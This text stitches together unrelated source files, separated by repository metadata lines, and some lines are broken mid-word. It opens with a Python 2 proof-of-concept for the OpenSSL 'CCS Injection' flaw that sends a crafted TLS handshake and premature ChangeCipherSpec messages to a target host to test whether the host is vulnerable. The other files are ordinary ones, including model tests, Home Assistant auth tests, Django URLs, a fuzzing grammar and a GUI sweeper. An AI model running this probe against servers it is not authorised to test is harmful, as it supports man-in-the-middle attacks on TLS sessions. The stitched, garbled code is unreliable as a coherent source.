'port': [443], # 该协议常用的端口号,需为int类型
'layer3_protocol': ['tcp'], # 该协议基于哪个传输层协议(tcp/udp/sctp)
},
# 漏洞相关信息
'vul': {
'app_name': 'openssl', # 漏洞所涉及的应用名称
'vul_version': ['<0.9.8y', # 受漏洞影响的应用版本
['1.0.0', '1.0.0l'],
['1.0.0', '1.0.0g']],
'type': None, # 漏洞类型
'tag': ['openssl', 'man in middle'], # 漏洞相关Tag
'desc': '''
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not
properly restrict processing of ChangeCipherSpec messages,which allows man-in-the-middle
attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL
communications, and consequently hijack sessions or obtain sensitive information,
via a crafted TLS handshake, aka the "CCS Injection" vulnerability.
''', # 漏洞描述
'references': ['https://portal.nsfocus.com/vulnerability/list/',
'http://ccsinjection.lepidum.co.jp/blog/2014-06-05/CCS-Injection-en/index.html',
'https://gist.github.com/rcvalle/71f4b027d61a78c42607',
], # 参考链接
},
}
def _init_user_parser(self):
self.user_parser.add_option('--msgtype', dest='msg_type', action='store', type='int', default=1,
help='define the 11th bype data of the handshake message. '
'The optional values are "0", "1", "2" or "3"')
self.user_parser.add_option('-p', '--port',
dest='port', action='store', type='int', default=443,
|
help='host port.')
handshake_message = "" \
"\x16" \
"\x03\x01" \
"\x00\x9a" \
"\x01" \
"\x00\x00\x
|
96" \
"\x03\x01" \
"\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00" \
"\x00\x68" \
"\xc0\x14" \
"\xc0\x13" \
"\xc0\x12" \
"\xc0\x11" \
"\xc0\x10" \
"\xc0\x0f" \
"\xc0\x0e" \
"\xc0\x0d" \
"\xc0\x0c" \
"\xc0\x0b" \
"\xc0\x0a" \
"\xc0\x09" \
"\xc0\x08" \
"\xc0\x07" \
"\xc0\x06" \
"\xc0\x05" \
"\xc0\x04" \
"\xc0\x03" \
"\xc0\x02" \
"\xc0\x01" \
"\x00\x39" \
"\x00\x38" \
"\x00\x37" \
"\x00\x36" \
"\x00\x35" \
"\x00\x33" \
"\x00\x32" \
"\x00\x31" \
"\x00\x30" \
"\x00\x2f" \
"\x00\x16" \
"\x00\x15" \
"\x00\x14" \
"\x00\x13" \
"\x00\x12" \
"\x00\x11" \
"\x00\x10" \
"\x00\x0f" \
"\x00\x0e" \
"\x00\x0d" \
"\x00\x0c" \
"\x00\x0b" \
"\x00\x0a" \
"\x00\x09" \
"\x00\x08" \
"\x00\x07" \
"\x00\x06" \
"\x00\x05" \
"\x00\x04" \
"\x00\x03" \
"\x00\x02" \
"\x00\x01" \
"\x01" \
"\x00" \
"\x00\x05" \
"\x00\x0f" \
"\x00\x01" \
"\x01"
ccs_message = "" \
"\x14" \
"\x03\x01" \
"\x00\x01" \
"\x01"
@staticmethod
def modify_str(str1, index, value):
return str1[:index] + value + str1[index + 1:]
@classmethod
def verify(cls, args):
options = args['options']
if options['msg_type'] == 1:
handshake_message = cls.modify_str(cls.handshake_message, 10, '\x02')
elif options['msg_type'] == 2:
handshake_message = cls.modify_str(cls.handshake_message, 10, '\x03')
elif options['msg_type'] == 3:
handshake_message = cls.modify_str(cls.handshake_message, 2, '\x00')
handshake_message = cls.modify_str(handshake_message, 10, '\x00')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.settimeout(5)
if options['target'].startswith('https://') or options['target'].startswith('http://'):
host = urlparse.urlparse(options['target']).netloc
else:
host = options['target']
ip = socket.gethostbyname(host)
s.connect((host, options['port']))
if options['verbose']:
print "connected to %s:%d\n\n" % (host, options['port'])
handshake_message = handshake_message[:11] + \
struct.pack('!I', int(time.time())) + \
handshake_message[15:]
for i in xrange(28):
handshake_message = cls.modify_str(handshake_message,
15 + i,
struct.pack("B", random.randint(0, 255) & 0xff))
s.send(handshake_message)
if options['verbose']:
print hex_dump(handshake_message)
print "%d bytes sent\n\n" % len(handshake_message)
rlists = [s]
wlists = []
buf_size = 16384
ccs_sent = 0
while True:
rs, ws, es = select.select(rlists, wlists, rlists, 10)
if not(rs or ws or es):
if options['verbose']:
print '\ntimeout...'
args['poc_ret'] = 'timeout'
args['success'] = False
return args
buf = s.recv(buf_size)
if options['verbose']:
print hex_dump(buf)
print "%d bytes received\n\n" % len(buf)
if ccs_sent:
for i in xrange(len(buf)):
if ( buf[i] == '\x15' and # alert
buf[i + 1] == '\x03' and
buf[i + 5] == '\x02'): # fatal
if (buf[i + 6] == '\x0a'): # unexpected_message
if options['verbose']:
print "%s: Not Vulnerable\n" % host
args['success'] = False
return args
else:
break
break
else:
for i in xrange(len(buf)):
if ( buf[i] == '\x16' and # handshake
buf[i + 1] == '\x03' and
buf[i + 5] == '\x02' and # server_hello
buf[i + 9] == '\x03'):
ccs_message = cls.modify_str(cls.ccs_message, 2, buf[i + 10]) # Use the protocol version sent by the server.
if ( buf[i] == '\x16' and # handshake
buf[i + 1] == '\x03' and
buf[i + 3] == '\x00' and
buf[i + 4] == '\x04' and
buf[i + 5] == '\x0e' and # server_hello_done
buf[i + 6] == '\x00' and
buf[i + 7] == '\x00' and
buf[i + 8] == '\x00'):
# Send the change cipher spec message twice to force
# an alert in the case the server is not patched.
s.send(ccs_message)
if options['verbose']:
print hex_dump(ccs_message)
p
|
huggingface/transformers
|
tests/mobilebert/test_modeling_mobilebert.py
|
Python
|
apache-2.0
| 15,383
| 0.00351
|
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import MobileBertConfig, is_torch_available
from transformers.models.auto import get_values
from transformers.testing_utils import require_sentencepiece, require_tokenizers, require_torch, slow, torch_device
from ..test_configuration_common import ConfigTester
from ..test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
MODEL_FOR_PRETRAINING_MAPPING,
MobileBertForMaskedLM,
MobileBertForMultipleChoice,
MobileBertForNextSentencePrediction,
MobileBertForPreTraining,
MobileBertForQuestionAnswering,
MobileBertForSequenceClassification,
MobileBertForTokenClassification,
MobileBertModel,
)
class MobileBertModelTester:
def __init__(
self,
parent,
batch_size=13,
seq_length=7,
is_training=True,
use_input_mask=True,
use_token_type_ids=True,
use_labels=True,
vocab_size=99,
hidden_size=64,
embedding_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_labels=3,
num_choices=4,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_input_mask = use_input_mask
self.use_token_type_ids = use_token_type_ids
self.use_labels = use_labels
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.embedding_size = embedding_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_labels = num_labels
self.num_choices = num_choices
self.scope = scope
def prepare_config_and_inputs(self):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = random_attention_mask([self.batch_size, self.seq_length])
token_type_ids = None
if self.use_token_type_ids:
token_type_ids = ids_tensor([self.batch_size, self.seq_length], self.type_vocab_size)
sequence_labels = None
token_labels = None
choice_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
choice_labels = ids_tensor([self.batch_size], self.num_choices)
config = self.get_config()
return config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
def get_config(self):
return MobileBertConfig(
vocab_size=self.vocab_size,
hidden_size=self.hidden_size,
num_hidden_layers=self.num_hidden_layers,
num_attention_heads=self.num_attention_heads,
intermediate_size=self.intermediate_size,
embedding_size=self.embedding_size,
hidden_act=self.hidden_act,
hidden_dropout_prob=self.hidden_dropout_prob,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
max_position_embeddings=self.max_position_embeddings,
type_vocab_size=self.type_vocab_size,
is_decoder=False,
initializer_range=self.initializer_range,
)
def create_and_check_mobilebert_model(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = MobileBertModel(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids)
res
|
ult = model(input_ids, token_type_ids=token_type_ids)
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
self.parent.assertEqual(result.pooler_output.shape, (self.batch_size, self.hidden_size))
def create_and_check_mobilebert_for_masked_lm(
|
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = MobileBertForMaskedLM(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask, token_type_ids=token_type_ids, labels=token_labels)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_mobilebert_for_next_sequence_prediction(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = MobileBertForNextSentencePrediction(config=config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=input_mask,
token_type_ids=token_type_ids,
labels=sequence_labels,
)
self.parent.assertEqual(result.logits.shape, (self.batch_size, 2))
def create_and_check_mobilebert_for_pretraining(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = MobileBertForPreTraining(config=config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=input_mask,
token_type_ids=token_type_ids,
labels=token_labels,
next_sentence_label=sequence_labels,
)
self.parent.assertEqual(result.prediction_logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
self.parent.assertEqual(result.seq_relationship_logits.shape, (self.batch_size, 2))
def create_and_check_mobilebert_for_question_answering(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = MobileBertForQuestionAnswering(config=config)
model.to(torch_device)
model.eval()
result = model(
input_ids,
attention_mask=input_mask,
token_type_ids=token_type_ids,
start_positions=sequence_labels,
end_positions=sequence_labels,
)
self.parent.assertEqual(result.start_logits.shape, (self.batch_size, self.seq_length))
self.parent.assertEqual(result.end_logits.shape, (self.batch_size, self.seq_length))
def create_and_check_mobilebert_for_sequence_classification(
self, config, input_ids, token_type_ids, input_mask, sequence_labels, token_labels, choice_labels
):
config.n
|
Danielhiversen/home-assistant
|
tests/auth/test_auth_store.py
|
Python
|
apache-2.0
| 9,513
| 0.00021
|
"""Tests for the auth store."""
import asyncio
from unittest.mock import patch
from homeassistant.auth import auth_store
async def test_loading_no_group_data_format(hass, hass_storage):
"""Test we correctly load old data without any groups."""
hass_storage[auth_store.STORAGE_KEY] = {
"version": 1,
"data": {
"credentials": [],
"users": [
{
"
|
id": "user-id",
"is_active": True,
"is_owner": True,
"name": "Paulus",
"system_generated": False,
},
{
"id": "system-id",
"is_active": True,
"is_owner": True,
"name": "Hass.io",
"system_generated": True,
},
],
"refresh_tokens": [
|
{
"access_token_expiration": 1800.0,
"client_id": "http://localhost:8123/",
"created_at": "2018-10-03T13:43:19.774637+00:00",
"id": "user-token-id",
"jwt_key": "some-key",
"last_used_at": "2018-10-03T13:43:19.774712+00:00",
"token": "some-token",
"user_id": "user-id",
"version": "1.2.3",
},
{
"access_token_expiration": 1800.0,
"client_id": None,
"created_at": "2018-10-03T13:43:19.774637+00:00",
"id": "system-token-id",
"jwt_key": "some-key",
"last_used_at": "2018-10-03T13:43:19.774712+00:00",
"token": "some-token",
"user_id": "system-id",
},
{
"access_token_expiration": 1800.0,
"client_id": "http://localhost:8123/",
"created_at": "2018-10-03T13:43:19.774637+00:00",
"id": "hidden-because-no-jwt-id",
"last_used_at": "2018-10-03T13:43:19.774712+00:00",
"token": "some-token",
"user_id": "user-id",
},
],
},
}
store = auth_store.AuthStore(hass)
groups = await store.async_get_groups()
assert len(groups) == 3
admin_group = groups[0]
assert admin_group.name == auth_store.GROUP_NAME_ADMIN
assert admin_group.system_generated
assert admin_group.id == auth_store.GROUP_ID_ADMIN
read_group = groups[1]
assert read_group.name == auth_store.GROUP_NAME_READ_ONLY
assert read_group.system_generated
assert read_group.id == auth_store.GROUP_ID_READ_ONLY
user_group = groups[2]
assert user_group.name == auth_store.GROUP_NAME_USER
assert user_group.system_generated
assert user_group.id == auth_store.GROUP_ID_USER
users = await store.async_get_users()
assert len(users) == 2
owner, system = users
assert owner.system_generated is False
assert owner.groups == [admin_group]
assert len(owner.refresh_tokens) == 1
owner_token = list(owner.refresh_tokens.values())[0]
assert owner_token.id == "user-token-id"
assert owner_token.version == "1.2.3"
assert system.system_generated is True
assert system.groups == []
assert len(system.refresh_tokens) == 1
system_token = list(system.refresh_tokens.values())[0]
assert system_token.id == "system-token-id"
assert system_token.version is None
async def test_loading_all_access_group_data_format(hass, hass_storage):
"""Test we correctly load old data with single group."""
hass_storage[auth_store.STORAGE_KEY] = {
"version": 1,
"data": {
"credentials": [],
"users": [
{
"id": "user-id",
"is_active": True,
"is_owner": True,
"name": "Paulus",
"system_generated": False,
"group_ids": ["abcd-all-access"],
},
{
"id": "system-id",
"is_active": True,
"is_owner": True,
"name": "Hass.io",
"system_generated": True,
},
],
"groups": [{"id": "abcd-all-access", "name": "All Access"}],
"refresh_tokens": [
{
"access_token_expiration": 1800.0,
"client_id": "http://localhost:8123/",
"created_at": "2018-10-03T13:43:19.774637+00:00",
"id": "user-token-id",
"jwt_key": "some-key",
"last_used_at": "2018-10-03T13:43:19.774712+00:00",
"token": "some-token",
"user_id": "user-id",
"version": "1.2.3",
},
{
"access_token_expiration": 1800.0,
"client_id": None,
"created_at": "2018-10-03T13:43:19.774637+00:00",
"id": "system-token-id",
"jwt_key": "some-key",
"last_used_at": "2018-10-03T13:43:19.774712+00:00",
"token": "some-token",
"user_id": "system-id",
"version": None,
},
{
"access_token_expiration": 1800.0,
"client_id": "http://localhost:8123/",
"created_at": "2018-10-03T13:43:19.774637+00:00",
"id": "hidden-because-no-jwt-id",
"last_used_at": "2018-10-03T13:43:19.774712+00:00",
"token": "some-token",
"user_id": "user-id",
},
],
},
}
store = auth_store.AuthStore(hass)
groups = await store.async_get_groups()
assert len(groups) == 3
admin_group = groups[0]
assert admin_group.name == auth_store.GROUP_NAME_ADMIN
assert admin_group.system_generated
assert admin_group.id == auth_store.GROUP_ID_ADMIN
read_group = groups[1]
assert read_group.name == auth_store.GROUP_NAME_READ_ONLY
assert read_group.system_generated
assert read_group.id == auth_store.GROUP_ID_READ_ONLY
user_group = groups[2]
assert user_group.name == auth_store.GROUP_NAME_USER
assert user_group.system_generated
assert user_group.id == auth_store.GROUP_ID_USER
users = await store.async_get_users()
assert len(users) == 2
owner, system = users
assert owner.system_generated is False
assert owner.groups == [admin_group]
assert len(owner.refresh_tokens) == 1
owner_token = list(owner.refresh_tokens.values())[0]
assert owner_token.id == "user-token-id"
assert owner_token.version == "1.2.3"
assert system.system_generated is True
assert system.groups == []
assert len(system.refresh_tokens) == 1
system_token = list(system.refresh_tokens.values())[0]
assert system_token.id == "system-token-id"
assert system_token.version is None
async def test_loading_empty_data(hass, hass_storage):
"""Test we correctly load with no existing data."""
store = auth_store.AuthStore(hass)
groups = await store.async_get_groups()
assert len(groups) == 3
admin_group = groups[0]
assert admin_group.name == auth_store.GROUP_NAME_ADMIN
assert admin_group.system_generated
assert admin_group.id == auth_store.GROUP_ID_ADMIN
user_group = groups[1]
assert user_group.name == auth_store.GROUP_NAME_USER
assert user_group.system_generated
assert user_group.id == auth_store.GROUP_ID_USER
read_group = groups[2]
assert read_group.name == auth_store.GROUP_NAME_READ_ONLY
assert read_group.system_generated
assert read_group.id == auth_store.GROUP_ID_READ_ONLY
users = await store.async_get_users()
assert len(users) == 0
async def test_system_groups_store_id_and_name(hass, hass_s
|
CCBG/django-rolodex
|
rolodex/urls.py
|
Python
|
mit
| 1,436
| 0.009053
|
from django.conf.urls import patterns, url
from ro
|
lodex import views
urlpatterns = [
# Default view if the user have not navigated yet
|
url(r'^$', views.index, name='index'),
# company related urls
url(r'^company/add/$', views.company_add, name='company_add'),
url(r'^company/edit/(?P<company_name>[A-Za-z0-9. \-]+)/$', views.company_edit, name='company_edit'),
url(r'^company/list/$', views.company_list, name='company_list'),
url(r'^company/delete/(?P<company_name>[A-Za-z0-9.\- ]+)/$', views.company_delete, name='company_delete'),
# company related urls
url(r'^contact/add/$', views.contact_add, name='contact_add'),
url(r'^contact/add/(?P<company_name>[A-Za-z0-9.\- ]+)/$', views.contact_add, name='contact_add'),
url(r'^contact/edit/(?P<contact_id>[0-9]+)/$', views.contact_edit, name='contact_edit'),
url(r'^contact/list/$', views.contact_list, name='contact_list'),
url(r'^contact/list/(?P<company_name>[A-Za-z0-9.\- ]+)/$', views.contact_list, name='contact_list'),
url(r'^contact/delete/(?P<contact_id>[0-9]+)/$', views.contact_delete, name='contact_delete'),
url(r'^docs/notes/$', views.doc_notes, name='doc_notes'),
]
|
AriZuu/micropython
|
tests/extmod/uzlib_decompio.py
|
Python
|
mit
| 691
| 0
|
try:
import uz
|
lib as zlib
import uio as io
except ImportError:
print("SKIP")
raise SystemExit
# Raw DEFLATE bitstream
buf = io.BytesIO(b'\xcbH\xcd\xc9\xc9\x07\x00')
inp = zlib.DecompIO(buf, -8)
print(bu
|
f.seek(0, 1))
print(inp.read(1))
print(buf.seek(0, 1))
print(inp.read(2))
print(inp.read())
print(buf.seek(0, 1))
print(inp.read(1))
print(inp.read())
print(buf.seek(0, 1))
# zlib bitstream
inp = zlib.DecompIO(io.BytesIO(b'x\x9c30\xa0=\x00\x00\xb3q\x12\xc1'))
print(inp.read(10))
print(inp.read())
# zlib bitstream, wrong checksum
inp = zlib.DecompIO(io.BytesIO(b'x\x9c30\xa0=\x00\x00\xb3q\x12\xc0'))
try:
print(inp.read())
except OSError as e:
print(repr(e))
|
Frenesius/CrawlerProject56
|
crawler/ConfigManager.py
|
Python
|
gpl-3.0
| 4,164
| 0.005764
|
__author__ = 'j'
import ConfigParser
class ParseConfig:
config = ConfigParser.ConfigParser()
def __init__(self):
pass
def sumSection(self, filePath):
'''
Counts the row amounts in the config file.
:param file: path to the file.
:return: Int with the amount of rows in a config file.
'''
conf = self.config
conf.read(filePath)
sumCrawl = 0
for x in range(1,100):
a = "ROW"+str(x)
if conf.has_section(a):
crawl = conf.get(a, 'crawl')
if crawl == "1":
sumCrawl += 1
return sumCrawl
def getCrawlList(self, filePath):
'''
Gives the List back of the Sections (TableRows) that needs to be crawled.
:param filePath: Path to the config file.
:return: Array with the rows.
'''
try:
self.config.read(filePath)
except:
"CrawlList wrong"
listCrawl = []
for x in range(1,100):
a = "ROW"+str(x)
if self.config.has_section(a):
crawl = self.config.get(a, 'crawl')
if crawl == "1":
listCrawl.append(x)
return listCrawl
def getValuexPath(self, int, filePath):
file = filePath
self.config.read(file)
if self.config.has_option("ROW"+str(int), "xpathvalue"):
customPath = self.config.get("ROW"+str(int), "xpathvalue")
else:
customPath = self.config.get("
|
DEFAULT", "xpathvalue")
return customPath
def getKeyxPath(self, int, filePath):
file = filePath
self.config.read(file)
if self.config.has_option("ROW"+str(int), "xpathkey"):
customPath = self.config.get("ROW"+str(int), "xpathkey")
el
|
se:
customPath = self.config.get("DEFAULT", "xpathkey")
return customPath
def getxPathPriceCrawler(self, int, filePath):
'''
Gets the xpaths in the config of the price crawler.
:param int: The row number.
:param filePath:Path to the config file.
:return: Dict with the xpaths.
'''
file = filePath
self.config.read(file)
pathDict = {
'xpathshopname':None,
'xpathshopscore':None,
'xpathdelivery':None,
'xpathbareprice':None,
'xpathshopprice':None,
'xpathclickout':None,
}
#####
if self.config.has_option("ROW"+str(int), "xpathshopname"):
pathDict['xpathshopname'] = self.config.get("ROW"+str(int), "xpathshopname")
else:
pathDict['xpathshopname'] = self.config.get("DEFAULT", "xpathshopname")
#####
if self.config.has_option("ROW"+str(int), "xpathshopscore"):
pathDict['xpathshopscore'] = self.config.get("ROW"+str(int), "xpathshopscore")
else:
pathDict['xpathshopscore'] = self.config.get("DEFAULT", "xpathshopscore")
#####
if self.config.has_option("ROW"+str(int), "xpathdelivery"):
pathDict['xpathdelivery'] = self.config.get("ROW"+str(int), "xpathdelivery")
else:
pathDict['xpathdelivery'] = self.config.get("DEFAULT", "xpathdelivery")
#####
if self.config.has_option("ROW"+str(int), "xpathbareprice"):
pathDict['xpathbareprice'] = self.config.get("ROW"+str(int), "xpathbareprice")
else:
pathDict['xpathbareprice'] = self.config.get("DEFAULT", "xpathbareprice")
#####
if self.config.has_option("ROW"+str(int), "xpathshopprice"):
pathDict['xpathshopprice'] = self.config.get("ROW"+str(int), "xpathshopprice")
else:
pathDict['xpathshopprice'] = self.config.get("DEFAULT", "xpathshopprice")
#####
if self.config.has_option("ROW"+str(int), "xpathclickout"):
pathDict['xpathclickout'] = self.config.get("ROW"+str(int), "xpathclickout")
else:
pathDict['xpathclickout'] = self.config.get("DEFAULT", "xpathclickout")
#####
return pathDict
|
d0c-s4vage/gramfuzz
|
examples/grams/postal.py
|
Python
|
mit
| 2,381
| 0.009244
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gramfuzz.fields import *
import names
TOP_CAT = "postal"
# Adapted from https://en.wikipedia.org/wiki/Backus%E2%80%93Naur_form
# The name rules have been modified and placed into names.py
class PDef(Def):
cat = "postal_def"
class PRef(Ref):
cat = "postal_def"
EOL = "\n"
# this will be the top-most rule
Def("postal_address",
PRef("name-part"), PRef("street-address"), PRef("zip-part"),
cat="postal")
# these will be the grammar rules that should not be randomly generated
# as a top-level rule
PDef("name-part",
Ref("name", cat=names.TOP_CAT), EOL
)
PDef("street-address",
PRef("house-num"), PRef("street-name"), Opt(PRef("apt-num")), EOL,
sep=" ")
PDef("house-num", UInt)
PDef("street-name", Or(
"Sesame Street", "Yellow Brick Road", "Jump Street", "Evergreen Terrace",
"Elm Street", "Baker Street", "Paper Street", "Wisteria Lane",
"Coronation Street", "Rainey Str
|
eet", "Spooner Street",
"0day Causeway", "Diagon Alley",
))
PDef("zip-part",
PRef("town-name"), ", ", PRef("state-code"), " ", PRef("zip-code"), EOL
)
PDef("apt-num",
UInt(min=0, max=10000), Opt(String(charset=String.charset_alpha_upper, min=1, max=2))
)
PDef("town-name", Or(
"Seoul", "São Paulo", "Bombay", "Jakarta", "Karachi", "Moscow",
"Istanbul", "Mexico City", "Shanghai", "Tokyo", "New York", "Bangkok",
"Beijing"
|
, "Delhi", "London", "HongKong", "Cairo", "Tehran", "Bogota",
"Bandung", "Tianjin", "Lima", "Rio de Janeiro" "Lahore", "Bogor",
"Santiago", "St Petersburg", "Shenyang", "Calcutta", "Wuhan", "Sydney",
"Guangzhou", "Singapore", "Madras", "Baghdad", "Pusan", "Los Angeles",
"Yokohama", "Dhaka", "Berlin", "Alexandria", "Bangalore", "Malang",
"Hyderabad", "Chongqing", "Ho Chi Minh City",
))
PDef("state-code", Or(
"AL", "AK", "AS", "AZ", "AR", "CA", "CO", "CT", "DE", "DC", "FL", "GA",
"GU", "HI", "ID", "IL", "IN", "IA", "KS", "KY", "LA", "ME", "MD", "MH",
"MA", "MI", "FM", "MN", "MS", "MO", "MT", "NE", "NV", "NH", "NJ", "NM",
"NY", "NC", "ND", "MP", "OH", "OK", "OR", "PW", "PA", "PR", "RI", "SC",
"SD", "TN", "TX", "UT", "VT", "VA", "VI", "WA", "WV", "WI", "WY",
))
PDef("zip-code",
String(charset="123456789",min=1,max=2), String(charset="0123456789",min=4,max=5),
Opt("-", String(charset="0123456789",min=4,max=5))
)
|
ejetzer/spinmob
|
egg/examples/example_sweeper.py
|
Python
|
gpl-3.0
| 5,048
| 0.008122
|
import numpy as _n
import time as _t
import spinmob.egg as egg
##### GUI DESIGN
# create the main window
w = egg.gui.Window(autosettings_path="example_sweeper_w.cfg")
# add the "go" button
b_sweep = w.place_object(egg.gui.Button("Sweep!", checkable=True)).set_width(50)
b_select = w.place_object(egg.gui.Button("Use Blue Range", checkable=True)).set_width(90)
l_x = w.place_object(egg.gui.Label("x:"), alignment=2)
n_x = w.place_object(egg.gui.NumberBox(int=False))
# move to the second row and add a TreeDictionary for our "settings"
w.new_autorow()
settings = w.place_object(egg.gui.TreeDictionary('example_sweeper.cfg'), column_span=4, alignment=1)
settings.add_parameter('sweep/x_start', -10, type='float')
settings.add_parameter('sweep/x_stop', 10, type='float')
settings.add_parameter('sweep/x_steps', 200, type='float')
# load previous settings if they exist
settings.load()
# add a tabbed interface for the plotting area, spanning the first and second rows
tabs = w.place_object(egg.gui.TabArea(), 10,0, row_span=2, alignment=0)
w.set_column_stretch(10)
# add a tab for some plots
t_raw = tabs.add_tab("Raw Plots")
# add a databox plotter object to the tab
d_sweep = t_raw.place_object(egg.gui.DataboxPlot(autosettings_path="example_sweeper_d_sweep.cfg"), alignment=0)
d_sweep[
|
'x'] = []
d_sweep['mag'] = []
d_sweep['phase'] = []
# add a "region of interest" (ROI) for selecting the sweep range
roi_sweep = egg.pyqtgraph.LinearRegionItem([settings['sweep/x_start'], settings['sweep/x_sto
|
p']])
d_sweep.ROIs = [roi_sweep]
# show the blank plots
d_sweep.plot()
##### MAIN FUNCTIONALITY
# define a function to set some parameter on an external instrument
def set_x(x):
"""
Pretends to set some instrument to a value "x" somehow.
This is where your code should go.
"""
# for now just update the gui
n_x.set_value(x)
# define a function to create fake data.
# This is where you might put code for talking to a piece of equipment
def get_data():
"""
Currently pretends to talk to an instrument and get back the magnitud
and phase of the measurement.
"""
# pretend we're measuring a noisy resonance at zero
y = 1.0 / (1.0 + 1j*n_x.get_value()) + _n.random.rand()*0.1
# and that it takes time to do so
_t.sleep(0.1)
# return mag phase
return abs(y), _n.angle(y, True)
# define a function to be called whenever the acquire button is pressed
def acquire_button_clicked(*a):
# don't start another loop if the button is unchecked!
if not b_sweep.is_checked(): return
# disable the settings during the sweep
settings.disable()
# figure out the sweep range from the graph if we're supposed to
if b_select.is_checked():
settings['sweep/x_start'], settings['sweep/x_stop'] = roi_sweep.getRegion()
# otherwise update the roi_sweep to match the sweep
else: roi_sweep.setRegion((settings['sweep/x_start'],
settings['sweep/x_stop']))
# clear the data and create new columns
d_sweep.clear()
d_sweep['x'] = []
d_sweep['mag'] = []
d_sweep['phase'] = []
# dump the settings to the databox header
settings.send_to_databox_header(d_sweep)
# start the loop and keep looping until someone
# unchecks the acquisition button or we max out the iterations
# setting iterations = 0 will loop infinitely
for x in _n.linspace(settings['sweep/x_start'],
settings['sweep/x_stop'],
settings['sweep/x_steps']):
# make sure the button is still pressed
if not b_sweep.is_checked(): break
# set the current value
set_x(x)
# get the data
m, p = get_data()
# store the data
d_sweep.append_data_point([x,m,p])
# plot the data
d_sweep.plot()
# process other window events so the GUI doesn't freeze!
w.process_events()
# in case the button is still checked
b_sweep.set_checked(False)
# re-enable the settings
settings.enable()
# connect the button
b_sweep.signal_clicked.connect(acquire_button_clicked)
######### OTHER GUI STUFF
# Define a function to save the settings whenever
# they change and connect the signal
def settings_changed(*a): settings.save()
# connecting is a little different for TreeDictionaries
settings.connect_any_signal_changed(settings_changed)
# overwrite the post_load function so it plots and sets up the settings
def d_sweep_after_load():
# dump the header into the settings
settings.update(d_sweep)
# update the roi_sweep region
roi_sweep.setRegion((settings['sweep/x_start'], settings['sweep/x_stop']))
# actually overwrite the existing function
d_sweep.after_load_file = d_sweep_after_load
# overwrite the existing shutdown / destroy sequence
def shutdown():
print "Closing but not destroying..."
b_sweep.set_checked(False)
return
w.event_close = shutdown
# show the window!
w.show(True)
|
pywbem/pywbemtools
|
tests/unit/pywbemcli/all_types_method_mock_v1old.py
|
Python
|
apache-2.0
| 2,630
| 0
|
"""
Test mock script that installs a test method provider for CIM method
AllTypesMethod() in CIM class PyWBEM_AllTypes, using the old setup approach
with global variables.
Note: This script and its method provider perform checks because their purpose
is to test the provider dispatcher. A real mock script with a real method
provider would not need to perform any of these checks.
"""
import pywbem
import pywbem_mock
assert "CONN" in globals()
assert 'SERVER' in globals()
assert 'VERBOSE' in globals()
global CONN # pylint: disable=global-at-module-level
class CIM_AllTypesMethodProvider(pywbem_mock.MethodProvider):
"""
User test provider for InvokeMethod using CIM_Foo and method1.
This is basis for testing passing of input parameters correctly and
generating some exceptions. It uses only one input parameter where the
value defines the test and one return parameter that provides data from the
provider, normally the value of the parameter defined with the input
parameter. Test for existence of method named method1
"""
provider_classnames = 'PyWBEM_AllTypes'
def __init__(self, cimrepository):
super(CIM_AllTypesMethodProvider, self).__init__(cimrepository)
def InvokeMethod(self, methodname, localobject, params):
"""
Simplistic test method. Validates methodname, localobject,
and returns return value 0 and the input parameters.
The parameters and return for Invoke method are defined in
:meth:`~pywbem_mock.MethodProvider.InvokeMethod`
"""
namespace = localobject.namespace
